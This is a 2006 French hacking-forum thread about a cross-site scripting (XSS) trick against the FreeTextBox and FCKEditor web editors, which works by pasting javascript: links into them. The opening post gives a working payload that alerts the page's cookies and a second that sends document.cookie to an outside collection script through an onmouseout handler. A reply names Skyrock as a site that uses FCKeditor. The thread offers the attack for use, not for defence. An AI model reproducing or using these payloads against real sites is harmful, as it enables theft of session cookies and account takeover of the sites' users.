logo

Knowledge Is Power

 
 

- Reinit des nouveaux posts -

- Recherche -

Messages Privés - Derniers posts
S'enregistrer - Login - Liste des membres
Vous logger : Login Pass

Underground & Hacking >> XSS pour FreeTextBox et FCKEditor Newtopic | Reply
poster txt
Psykocrash
Inscrit le 14-05-2006
Posté le 14-05-2006 13:43

J'ai trouvé un moyen d'exécuter du javascript (pour récupérer les cookies par ex) sur tous les sites utilisants FreeTextBox et FCKEditor.

J'ai remarqué que l'on pouvait copier le contenu d'une page web et le coller dans l'éditeur, et qu'il garderait la même forme (gras, italique, "LIEN", etc.). J'ai donc créé une page dans laquelle j'ai mis un lien qui contient du javascript, et j'ai fait un copier/coller.
<html><body><a href="javascript: alert('Cookie:\\n'+document.cookie+'\\nHave Fun !')">Cliquez ici</a></body></html>
C'est passé comme sur des roulettes, mais cela requière qu'une personne clique sur le lien. On peut alors utiliser un OnMouseOut et mettre ça par exemple :
<a href="#" onmouseout="javascript: document.location='http://www.monsite.com/get_cookie.php?'+document.cookie">Lien</a>

Have Fun !

[ Ce Message a été édité par: Psykocrash le 2006-05-14 13:46 ]
profil | edit | quote
phUnbOx
Inscrit le 27-02-2006
Posté le 14-05-2006 14:14

Skyrock utilise FCKeditor
profil | edit | quote
Newtopic | Reply

Online : 38 Guests


Retour Index NewFFR Repository : http://taz.newffr.com
Cagades à Stick : http://alcane.newffr.com
Forum HTML et Archive -> ici
ForumFR Sql/Xml (2006/04) (SF pas à jour du tout...) - Alive since 2001 Newffr.com
Pour toute plainte ou problème -> Contacter Borax, Hyatus, Tweakie ou Stick par message privé (ou Gueulez sur le forum :) )
Retour haut de page